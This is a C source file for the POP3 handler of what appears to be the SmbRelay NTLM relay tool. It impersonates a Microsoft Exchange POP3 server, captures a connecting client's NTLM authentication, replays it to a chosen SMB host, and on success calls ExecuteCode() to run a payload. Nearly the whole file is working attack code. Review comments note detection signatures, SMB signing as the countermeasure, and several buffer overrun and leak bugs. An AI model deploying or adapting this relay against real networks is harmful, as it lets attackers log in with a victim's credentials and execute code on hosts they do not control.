#include "pop3relay.h"
#include "payload.h"

/* Verbosity level defined in another translation unit; in this file it is only
 * forwarded to GetNTLMPacketInfo() inside HandleIncommingPOP3Request(). */
extern int verbose;
00019
/*
 * HandleIncommingPOP3Request - serve one POP3 client on relay->source and
 * forward its NTLM authentication to the SMB service reachable at
 * destinationhostname:destinationport (relay->destination).
 *
 * Sequence, as implemented below:
 *   1. send a fake Exchange POP3 banner and read the client's first command;
 *   2. answer CAPA and AUTH so that the client proceeds with "AUTH NTLM";
 *   3. base64-decode the client's NTLM Type 1 message (only dumped; the SMB
 *      side uses a Type 1 produced by BuildSmbPacket1());
 *   4. connect to the SMB host, send NEGOTIATEPROTOCOLREQUEST with a dialect
 *      list, then obtain the server's Type 2 challenge via GetSmbPacket2();
 *   5. base64-encode that challenge and send it to the POP3 client;
 *   6. decode the client's Type 3, wrap it in a SESSIONSETUPANDX request and
 *      send it to the SMB host;
 *   7. if NtStatus is zero and the session is not a guest session, report
 *      AUTHOK to the client and call ExecuteCode(*relay) (defined elsewhere).
 *
 * Parameters:
 *   relay               - holds the POP3 client socket (source) and the SMB
 *                         socket (destination) used by the helpers
 *   destinationhostname - SMB host passed to ConnectToRemoteHost()
 *   destinationport     - SMB port passed to ConnectToRemoteHost()
 *
 * Returns 1 when the SMB session was established and ExecuteCode() was
 * called, 0 on any network, protocol or authentication failure.
 *
 * Defensive notes for anyone triaging traffic produced by this code:
 *   - the banner contains the literal "(SmbRelay)" and the CAPA/AUTH replies
 *     are fixed strings; both are usable as POP3-side signatures;
 *   - the Type 2 challenge handed to the POP3 client is the one issued by the
 *     SMB server, so the client's Type 3 is reusable against SMB; controls on
 *     the SMB side that tie NTLM authentication to the session (SMB signing
 *     and related NTLM relay protections) are what defeat this - confirm for
 *     the environment in question, nothing here inspects signing;
 *   - all diagnostic output is gated on `debug`, declared outside this file.
 *
 * NOTE(review): SmbPacket1, SmbPacket2 and SmbPacket3 are heap packets that are
 * never freed on any path (only p and NegotiateProtocol are released).
 * NOTE(review): every `buffer[i]='\0'` below is done without checking
 * i < sizeof(buffer); a reply that fills the buffer completely writes one byte
 * past its end.
 */
int HandleIncommingPOP3Request(RELAY *relay, char *destinationhostname, int destinationport)
{
/* Scratch buffers: `buffer` for POP3 client traffic, `buf` for SMB replies
 * (and, briefly, the "+ <base64>" line sent to the client), `buf1` for
 * base64-decoded NTLM messages, `buf2` for the outgoing Type 3 response. */
char buffer[4096];
char buf[4096];
char buf1[4096];
char buf2[4096];

/* Identity fields extracted from the client's Type 3 by GetNTLMPacketInfo().
 * CurrentDomain is filled but not used afterwards in this function. */
char CurrentUserName[256];
char CurrentDomain[256];
char CurrentWorkstation[256];
/* Heap-allocated SMB packets returned by the Build*/Get* helpers. */
smheader *SmbPacket1, *SmbPacket2, *SmbPacket3, *NegotiateProtocol;
tSmbNtlmAuthRequest *request;

uint16 packetlen; /* byte length of the NTLM blob currently in buf1 / SmbPacket2 */
int i;            /* byte count or status returned by the helpers */
char *p;          /* dialect list under construction for NEGOTIATEPROTOCOLREQUEST */
/* Impersonated Exchange 2003 banner; "(SmbRelay)" is a fingerprint of this tool. */
const char WelcomeMessage[]= "+OK Microsoft Exchange Server 2003 POP3 server version 6.5.7226.0 (SmbRelay) ready\r\n";
/* Canned POP3 replies. These are object-like macros, so despite being written
 * inside the function they are not scoped to it. */
#define ERRORR "-ERR The specified authentication package is not supported.\r\n"
#define CAPA "+OK Capability list follows\r\nAUTH NTLM\r\n+OK\r\n"
#define AUTH "+OK The operation completed successfully.\r\nNTLM\r\n.\r\n"
#define AUTHOK "+OK User successfully logged on.\r\n"
#define AUTHERROR "-ERR Authentication Failed\r\n"


printf("[+] Sending POP3 Banner\n");
/* Send the banner and block for the client's first line; the return value is
 * used as the number of bytes placed in `buffer` (<= 0 is treated as failure). */
i=SendBytesAndWaitForResponse(relay->source,(char*)WelcomeMessage, (int)strlen(WelcomeMessage), buffer,sizeof(buffer),SMBWAITTIMEOUT);
if (i<=0){
printf("Error Reading EHLO message\n"); /* wording is SMTP-style (EHLO) although this is the POP3 handler */
return(0);
}


/* `buffer` is not NUL-terminated yet; only fixed-length memcmp() is used on it
 * until the next read. memcmp() also compares 4 bytes even when i < 4. */
if (memcmp(buffer,"CAPA",4)==0) {
printf("[+] CAPA Requests\n");
/* Advertise NTLM as the only AUTH mechanism, then read the next command. */
i=SendBytesAndWaitForResponse(relay->source,(char*)CAPA, strlen(CAPA), buffer,sizeof(buffer),SMBWAITTIMEOUT);
if (i<=0) return(0);
buffer[i]='\0'; /* NOTE(review): out of bounds when i == sizeof(buffer) */
}
if (memcmp(buffer,"AUTH",4)!=0) {
printf("[-] AUTH NTLM packet not received from client\n");
/* Reply with ERRORR and give up; the helper's result is intentionally ignored. */
i=SendBytesAndWaitForResponse(relay->source,(char*)ERRORR, strlen(ERRORR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
return(0);
} else {
printf("[+] Sending AUTH NTLM option to the client\r\n");
/* Answer the AUTH query with the NTLM-only mechanism list and read the next line. */
i=SendBytesAndWaitForResponse(relay->source,(char*)AUTH, strlen(AUTH), buffer,sizeof(buffer),SMBWAITTIMEOUT);
if (i<=0) return(0);
buffer[i]='\0';
}

if (memcmp(buffer,"AUTH NTLM",9)!=0) {
/* `buffer` is client-controlled text, but it is passed as a %s argument, not
 * as the format string, so this is not a format-string issue. */
printf("[-] Not supported option %s received\n",buffer);
return(0);
}
/* Two client behaviours are accepted: the Type 1 sent inline on the
 * "AUTH NTLM" line, or sent on the following line after a "+ OK" continuation. */
if (strlen(buffer)>12){
printf("[+] received AUTH NTLM message\n");
memset((char*)&buf1,'\0',sizeof(buf1));
/* NOTE(review): assumes the base64 Type 1 starts at offset 12 of the line;
 * "AUTH NTLM " is only 10 bytes, so confirm against the client's actual format. */
packetlen=from64tobits(buf1, buffer+12);
request=(tSmbNtlmAuthRequest *)buf1;
dumpAuthRequest(0,request);
} else {
memset(buffer,'\0',sizeof(buffer));
/* Empty continuation reply; the client's Type 1 is expected on the next line. */
i=SendBytesAndWaitForResponse(relay->source,(char*)"+ OK\r\n", 6, buffer,sizeof(buffer),SMBWAITTIMEOUT);
if (i<=0){
printf("[-] Error Auth response with NTLM type1 packet\n");
return(0);
}
buffer[i]='\0';
printf("[+] received AUTH NTLM message\n");
memset((char*)&buf1,'\0',sizeof(buf1));
packetlen=from64tobits(buf1, buffer);
request=(tSmbNtlmAuthRequest *)buf1;

if (debug) {
printf("[+] received AUTH NTLM message: %s\n",buffer);
DumpMem(buf1,packetlen);
dumpAuthRequest(0,request);
}
}
/* `request` is not referenced again: the Type 1 sent to the SMB host below is
 * built by BuildSmbPacket1(), not derived from the client's. */



/* Open the SMB side of the relay. ConnectToRemoteHost() returns non-zero on success. */
i=ConnectToRemoteHost(relay,destinationhostname,destinationport);
if (!i) {
printf("[-] Unable to connect to remote host %s:%i\n",destinationhostname,destinationport);
return(0);
}
printf("[+] Sending SMB Protocol Authentication Handshake\n");
/* Build the dialect list; `i` appears to accumulate its byte length through
 * the out-parameter, since it is passed as the payload length below. */
p = AddDialect(NULL,"PC NETWORK PROGRAM 1.0",0x02, &i);
p = AddDialect(p,"LANMAN1.0", 0x02,&i);
p = AddDialect(p,"Windows for Workgroups 3.1a", 0x02,&i);
p = AddDialect(p,"LM1.2X002", 0x02,&i);
p = AddDialect(p,"LANMAN2.1", 0x02,&i);
p = AddDialect(p,"NT LM 0.12", 0x02,&i);
NegotiateProtocol=BuildSmbPacket(NULL,NEGOTIATEPROTOCOLREQUEST,0,p,i);
free(p);
/* The negotiate reply lands in `buf` but is not parsed; only i > 0 is checked. */
i=SendBytesAndWaitForResponse(relay->destination,(char*)NegotiateProtocol,SmbPacketLen(NegotiateProtocol),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
free(NegotiateProtocol);
if (i<=0){
printf("[-] Initial SMBHandShake (LanManager Negotiation) Failed\n");
return(0);
}

/* SMB packet carrying the relay's own NTLM Type 1 (never freed). */
SmbPacket1=BuildSmbPacket1();
if (debug) {
printf("\n[+] Dumping SMB Packet With NTLM Message Type 1\n");
DumpMem((char*)SmbPacket1,SmbPacketLen(SmbPacket1));
}

/* Exchange Type 1 for the server's Type 2 challenge (SmbPacket2, never freed). */
SmbPacket2=GetSmbPacket2(relay,SmbPacket1);
if (SmbPacket2==NULL) {
printf("[-] Unable to receive SMB Packet with NTLM Message Type 2\n");
return(0);
}
printf("[+] Received SMB Message with NTLM message type 2 packet\n");
/* Reads a 16-bit value located 4 bytes before the NTLM blob - presumably the
 * blob length field of the SMB response; confirm against the packet layout.
 * The raw memcpy also assumes host byte order matches the wire. */
memcpy((char*)&packetlen,GetNTLMPacketFromSmbPacket(SmbPacket2)-4,2);

if (debug) {
printf("[*] SMB Packet Dump:\n");
DumpMem((char*)SmbPacket2,SmbPacketLen(SmbPacket2));
printf("[*] NTLM Challenge packet from SMB message\n");
DumpMem((char*)GetNTLMPacketFromSmbPacket(SmbPacket2),packetlen);
dumpAuthChallenge(0,(tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2));
}

/* The challenge's flags field is overwritten with a fixed value before the
 * challenge is forwarded; the reason is not documented here. */
((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2))->flags=0xb207;
memset(buf1,'\0',sizeof(buf1));
/* NOTE(review): neither to64frombits() nor sprintf() is given an output size;
 * a large challenge (packetlen is server-controlled) can overrun buf1/buf. */
to64frombits((unsigned char*)&buf1, (unsigned char*)GetNTLMPacketFromSmbPacket(SmbPacket2), packetlen);
sprintf(buf,"+ %s\r\n",buf1);

printf("[+] Replaying NTLM Challenge from SMB Server to the POP3 Client\n");
if (debug)
{
printf("[+] Sending SMTP Response: %s\n",buf); /* log text says SMTP; this is the POP3 reply */
}
/* Forward the server challenge to the client and read its Type 3 line. */
i=SendBytesAndWaitForResponse(relay->source,(char*)buf,(int)strlen(buf),(char*)buffer,sizeof(buffer),SMBWAITTIMEOUT);
if (i<=0)
{
printf("[-] Unable to read NTLM packet 3 from POP3 client\n");
return(0);
}
buffer[i]='\0';

if (debug) printf("[*] Response: %s\n",buffer);
memset((char*)&buf1,'\0',sizeof(buf1));
/* buf1 now holds the client's decoded Type 3. */
packetlen=from64tobits(buf1, buffer);
if (debug) {

printf("[*] Raw authorization packet (len: %i)\n",packetlen);
DumpMem(buf1,packetlen);
dumpAuthResponse(0,(tSmbNtlmAuthResponse*)buf1);
}


/* Pull user/domain/workstation out of the Type 3 for logging and for the
 * SMB-side response. Only the user and workstation are used afterwards. */
GetNTLMPacketInfo((tSmbNtlmAuthResponse*)buf1,(char*)&CurrentUserName, (char*)&CurrentDomain, (char*)&CurrentWorkstation,verbose);
printf("[+] Trying to authenticate to remote SMB as %s\n",CurrentUserName);
/* Build the Type 3 for SMB into buf2 from the server challenge and the client's
 * Type 3 (last argument); the two NULL arguments presumably stand for values
 * this relay does not possess - see buildAuthResponse() for their meaning. */
buildAuthResponse((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2),(tSmbNtlmAuthResponse*)buf2,0,CurrentUserName,NULL,NULL,CurrentWorkstation, (tSmbNtlmAuthResponse*)buf1);
/* SESSIONSETUPANDX continuing the SmbPacket2 session (SmbPacket3, never freed). */
SmbPacket3=BuildSmbPacket((smheader*)SmbPacket2,SESSIONSETUPANDX,0,buf2,(int)SmbLength((tSmbNtlmAuthResponse *)buf2));


printf("[+] Sending Final SMB Authentication packet with NTLM Message type 3\n");
if (debug)
{
DumpMem((char*)SmbPacket3, SmbPacketLen(SmbPacket3));
}

i=SendBytesAndWaitForResponse(relay->destination,(char*)SmbPacket3, SmbPacketLen(SmbPacket3),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
if (i<=0){
printf("[-] Error reading Server Authentication Response\n");
/* Tell the client the login failed; the helper's result is ignored. */
i=SendBytesAndWaitForResponse(relay->source,AUTHERROR, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
return(0);
}
if (debug) {
printf("[*] SessionSetupAndX Completed - Dumping received packet\n");
DumpMem(buf,i);
}

/* `buf` is interpreted as an SMB header without checking that i covers it. */
if (((smheader*)buf)->NtStatus!=0x00000000) {
printf("[-] SessionSetupAndX Completed\n[-] Authentication against Remote Host Failed\n");
/* NOTE(review): sends AUTHOK with the length of AUTHERROR, so the client
 * receives a truncated "+OK ..." line although SMB authentication failed;
 * the other failure branches use AUTHERROR, which looks like the intent. */
i=SendBytesAndWaitForResponse(relay->source,AUTHOK, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
return(0);
}
/* Bit 0 of Action in the SessionSetupAndX response marks a guest logon;
 * that is treated as a failure here. */
if ( ((SessionSetupAndXResponse*)((smheader*)buf)->buffer)->Action & 0x0001 )
{
printf("[-] Authentication against Remote Host Failed. (Connected as Guest)\n");
i=SendBytesAndWaitForResponse(relay->source,AUTHERROR, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);

return(0);
}



printf("[+] SessionSetupAndX Completed \n");
printf("[+] Authenticacion against %s Succeed with username %s\n",destinationhostname,CurrentUserName); /* runtime string; typo left as is */
/* Report success to the client (reply ignored), then hand the authenticated
 * relay to ExecuteCode(), declared in payload.h; the RELAY is passed by value. */
i=SendBytesAndWaitForResponse(relay->source,AUTHOK, strlen(AUTHOK), buffer,sizeof(buffer),SMBWAITTIMEOUT);
ExecuteCode( *relay);

return(1);

}